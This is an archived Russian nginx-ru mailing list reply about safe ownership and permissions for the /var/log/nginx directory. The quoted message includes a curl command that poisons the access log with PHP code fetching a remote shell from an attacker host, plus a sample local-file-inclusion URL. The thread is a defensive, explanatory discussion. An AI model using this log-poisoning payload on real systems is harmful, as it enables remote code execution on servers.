Lexa Software: Nginx-ru@sysoev.ru archive

		Apache-Talk @lexa.ru
		Inet-Admins @info.east.ru
		Filmscanners @halftone.co.uk
		Security-alerts @yandex-team.ru
		nginx-ru @sysoev.ru

СТАТЬИ

ПЕРСОНАЛЬНОЕ

ПРОГРАММЫ

ПИШИТЕ
ПИСЬМА

АРХИВ :: nginx-ru

Nginx-ru mailing list archive (nginx-ru@sysoev.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: /var/log/nginx

To: nginx-ru@xxxxxxxxx
Subject: Re: /var/log/nginx
From: Maxim Dounin <mdounin@xxxxxxxxxx>
Date: Tue, 14 Dec 2010 21:51:54 +0300
In-reply-to: <4D07B1EE.6070908@xxxxxxxxx>
References: <4D07B1EE.6070908@xxxxxxxxx>

Hello!

On Tue, Dec 14, 2010 at 08:05:34PM +0200, Gena Makhomed wrote:

> Здравствуйте!
> 
> есть небольшие проблемы с /var/log/nginx
> 
> 1. если владелец этого каталога nginx:nginx,
> и права доступа 0700 - такая установка будет уязвима
> к symlink attack, потому что лог-файлы в этом каталоге
> master-процесс открывает на запись при запуске nginx
> и он не делает никаких проверок symlink это или нет.
> 
> 2. если владелец этого каталога root:root,
> и права доступа 0755 - такая установка будет уязвима
> к атаке "php local file inclusion vulnerability
> elevation to remote code execution":
> 
> # curl -A "<? include 'http://hack.ru/shell.php'; ?>" http://t/
> 
> # tail -n 1 /var/log/nginx/access.log
> 10.10.10.10 - - [14/Dec/2010:19:34:24 +0200] "GET / HTTP/1.1" 200
> 15777 "-" "<? include 'http://hack.ru/shell.php' ?>"
> 
> и если запущенный на хосте PHP можно каким-то путем заставить сделать
> include этого локального файла - выполнится код с удаленного сайта.
> например, http://site.ru/index.php?file=/var/log/nginx/access.log
> 
> код "<? include 'http://hack.ru/shell.php' ?>"  приведен только
> для примера, на самом деле, там может быть любой php-код, который
> будет работать даже в случае если параметр allow_url_fopen = Off
> 
> 3. если владелец этого каталога root:nginx,
> и права доступа 0750 - на первый взгляд всё нормально,
> однако если php-fastcgi входит в группу nginx,
> или пользователь httpd входит в группу nginx,
> то будет тот же результат, что и в п.2 - так что
> это решение можно назвать ненадежным и частичным.

Помимо случаев (2) и (3), кмк, стоит ещё рассмотреть случаи 
"php-fastcgi имеет uid 0" и "администратор написал пароль от 
root'а на стене".

Права на каталог с логами root:wheel 755 - хорошие, годные (только 
нужно не забывать при вращении создавать файлы с owner'ом nginx 
перед USR1, а то воркеры останутся без логов).

Проблемы же PHP нужно фиксить в рамках PHP.

Maxim Dounin

_______________________________________________
nginx-ru mailing list
nginx-ru@xxxxxxxxx
http://nginx.org/mailman/listinfo/nginx-ru

Follow-Ups:
- Re: /var/log/nginx
  - From: Gena Makhomed
- Re: /var/log/nginx
  - From: Gena Makhomed

References:
- /var/log/nginx
  - From: Gena Makhomed

Prev by Date: Re: /var/log/nginx
Next by Date: nginx-0.7.68
Previous by thread: Re: /var/log/nginx
Next by thread: Re: /var/log/nginx
Index(es):
- Date
- Thread